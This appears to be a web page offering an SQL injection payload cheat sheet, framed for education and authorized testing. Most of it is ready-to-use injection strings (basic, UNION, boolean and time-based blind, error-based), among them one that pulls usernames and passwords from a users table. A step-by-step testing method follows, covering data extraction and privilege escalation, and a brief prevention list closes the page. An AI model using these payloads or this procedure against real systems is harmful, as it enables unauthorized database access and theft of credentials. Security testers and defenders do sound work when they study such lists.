🧠 SQLi Payload Generator

These payloads are for educational purposes and authorized security testing only. Using these payloads against systems without explicit permission is illegal. Always obtain proper authorization before testing for SQL injection vulnerabilities.

Basic Injection: • ' OR 1=1 -- • ' OR 'a'='a • ') OR 1=1 -- • " OR 1=1 -- • admin'-- • admin'/* UNION-based: • ' UNION SELECT 1,2,3 -- • ' UNION SELECT null,username,password FROM users -- • ' UNION SELECT @@version,user(),database() -- Boolean Blind: • ' AND 1=1 -- • ' AND 1=2 -- • ' AND (SELECT COUNT(*) FROM users)>0 -- Time-based Blind: • '; WAITFOR DELAY '00:00:05' -- • ' AND SLEEP(5) -- • '; SELECT pg_sleep(5) -- Error-based: • ' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e)) -- • ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --

Testing Methodology: 1. Identify injection points (forms, URL parameters, headers) 2. Test for SQL errors with special characters 3. Determine the number of columns (UNION-based) 4. Identify database type and version 5. Extract sensitive data (usernames, passwords, etc.) 6. Test for privilege escalation Common Injection Points: • Login forms (username/password fields) • Search functionality • URL parameters (?id=1) • HTTP headers (User-Agent, X-Forwarded-For) • Cookie values • File upload parameters Detection Techniques: • Error messages revealing SQL syntax • Different responses for true/false conditions • Time delays in response • Changes in page content or behavior Database-Specific Payloads: • MySQL: SELECT @@version, SLEEP(), BENCHMARK() • PostgreSQL: SELECT version(), pg_sleep() • MSSQL: SELECT @@version, WAITFOR DELAY • Oracle: SELECT banner FROM v$version, DBMS_LOCK.SLEEP() • SQLite: SELECT sqlite_version() Prevention: • Use parameterized queries/prepared statements • Input validation and sanitization • Least privilege database access • Web Application Firewall (WAF) • Regular security testing